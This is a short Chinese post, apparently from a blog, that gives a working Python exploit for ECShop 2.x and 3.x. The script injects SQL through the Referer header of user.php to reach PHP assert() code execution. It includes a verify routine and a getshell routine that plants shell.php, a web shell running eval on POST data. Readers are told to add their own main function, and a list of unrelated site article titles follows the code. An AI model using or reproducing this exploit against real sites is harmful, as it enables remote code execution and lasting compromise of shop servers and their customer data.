ecshop v2 v3 EXP
2024-09-01 14:32:30
import requests
import binascii def get_v2Payload(code):
'''Ecshop V2.x payload'''
code = "{$abc'];@assert(%s);//}" %(code)
# print(code)
code = code.encode()
shellcode = binascii.hexlify(code).decode()
payload = "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:%s:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x%s,10-- -\";s:2:\"id\";s:4:\"' /*\";}554fcae493e564ee0dc75bdf2ebf94ca" % ((50 + len(shellcode)),shellcode)
return payload
def get_v3Payload(code):
'''Ecshop V3.x payload'''
code = "{$abc'];assert(%s);//}" %(code)
code = code.encode()
shellcode = binascii.hexlify(code).decode()
payload = "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:%s:\"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x%s,10-- -\";s:2:\"id\";s:4:\"' /*\";}45ea207d7a2b68c49582d2d22adf953a" % ((50 + len(shellcode)),shellcode)
return payload
def verify(url):
print(url)
flag = "allow_url_include"
code = "phpinfo()"
url = url + "/user.php"
ec2payload = get_v2Payload(code)
# print(ec2payload)
ec3payload = get_v3Payload(code)
payloads = [(ec2payload,'2.x'),(ec3payload,'3.x')]
for payload,version in payloads:
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0',
'Referer':payload
}
try:
rsp = requests.get(url,headers=headers,timeout=3)
if flag in rsp.text:
verifyInfo = {}
verifyInfo['URL'] = url
verifyInfo['version'] = version
print(verifyInfo)
break
except:
pass
def getshell(url):
code = "base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3NoZWxsLnBocCcsJzw/cGhwIGV2YWwoJF9QT1NUWzc3N10pOyA/Picp')"
i = url + "/user.php"
ec2payload = get_v2Payload(code)
# print(ec2payload)
ec3payload = get_v3Payload(code)
payloads = [(ec2payload,'2.x'),(ec3payload,'3.x')]
for payload,version in payloads:
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0',
'Referer':payload
}
try:
rsp = requests.get(i,headers=headers,timeout=5)
if rsp.status_code == 200:
shurl = url + "/shell.php"
srsp = requests.get(shurl,timeout=5)
if srsp.status_code == 200:
verifyInfo = {}
verifyInfo['URL'] = shurl
verifyInfo['version'] = version
print(verifyInfo)
break
except:
pass
大概就是这么个样子,具体要怎么用自己在添加主函数就行。
最新文章
- iOS开发UI篇—CAlayer(创建图层)
- Android应用的安全的攻防之战
- ASP.NET Web API 的简单示例
- hdu 1106:排序(水题,字符串处理 + 排序)
- 命名空间中的“MvcBuildViews”。 无效
- c++ 函数的函数声明
- jinfo命令(Java Configuration Info)
- 远程控制利器TeamViewer使用教程(图)
- 看懂 ,学会 .NET 事件的正确姿势-简单版
- 『Python』为什么调用函数会令引用计数+2
- Linux之hosts文件
- Flask图书管管理表
- 剑指offer错题记录
- 一种快速统计SQL Server每个表行数的方法
- windows10多桌面创建 切换 和分屏
- 详谈Oracle12c新特点容器数据库&;amp;可插拔数据库(CDB&;amp;PDB)
- VisualStudio: 窗口背景颜色设置成黑色
- 6. Ensemble learning &; AdaBoost
- HIVE函数的UDF、UDAF、UDTF
- thrift0.5入门操作